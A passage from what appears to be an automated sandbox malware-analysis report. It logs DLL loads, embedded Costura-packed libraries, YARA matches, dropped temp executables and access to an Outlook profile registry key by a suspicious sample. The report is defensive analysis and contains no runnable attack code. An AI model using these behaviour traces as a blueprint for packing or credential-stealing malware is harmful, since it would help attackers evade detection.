                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: framedynos.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                          Source: LKxcbzlwkz.exeStatic file information: File size 5015009 > 1048576
                          Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: winload_prod.pdb source: Temp.txt.1.dr
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: ntkrnlmp.pdb source: Temp.txt.1.dr
                          Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.1.dr
                          Source: Binary string: costura.costura.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.wpf.ui.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: !costura.polly.core.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: winload_prod.pdb\ source: Temp.txt.1.dr
                          Source: Binary string: costura.polly.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr
                          Source: Binary string: costura.polly.core.pdb.compressed source: LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr

                          Data Obfuscation

                          barindex
                          .NET source code contains potential unpacker
                          Source: JOUNLV.exe.0.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: aut66E4.tmp.0.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Source: 1.2.JOUNLV.exe.1bb50b90000.9.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                          Source: 1.2.JOUNLV.exe.1bb50b90000.9.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                          Source: 1.2.JOUNLV.exe.1bb4808b090.5.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                          Source: 1.2.JOUNLV.exe.1bb4808b090.5.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                          Source: 1.2.JOUNLV.exe.1bb50ae0000.8.raw.unpack, ReflectionMemberAccessor.cs.Net Code: CreateParameterlessConstructor
                          Yara detected Costura Assembly Loader
                          Source: Yara matchFile source: 1.0.JOUNLV.exe.1bb35cc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: LKxcbzlwkz.exe PID: 4924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: JOUNLV.exe PID: 4828, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\aut66E4.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, type: DROPPED
                          Source: JOUNLV.exe.0.drStatic PE information: 0xEBE8C2F3 [Fri Jun 3 00:40:19 2095 UTC]
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                          Source: aut66E4.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x397cbc
                          Source: LKxcbzlwkz.exeStatic PE information: real checksum: 0xa961f should be: 0x4cb254
                          Source: JOUNLV.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x397cbc
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B887860 push eax; iretd 1_2_00007FFD9B88786D
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B894243 push edi; retf 1_2_00007FFD9B894316
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B8B8138 push ebx; ret 1_2_00007FFD9B8B816A
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9B894159 push edi; retf 1_2_00007FFD9B894316
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9BA95904 push eax; retf 5F2Dh1_2_00007FFD9BA95ADD
                          Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exeCode function: 1_2_00007FFD9BA91B73 push edi; iretd 1_2_00007FFD9BA91B76
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeFile created: C:\Users\user\AppData\Local\Temp\aut66E4.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeFile created: C:\Users\user\AppData\Local\Temp\JOUNLV.exeJump to dropped file
                          Source: C:\Users\user\Desktop\LKxcbzlwkz.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
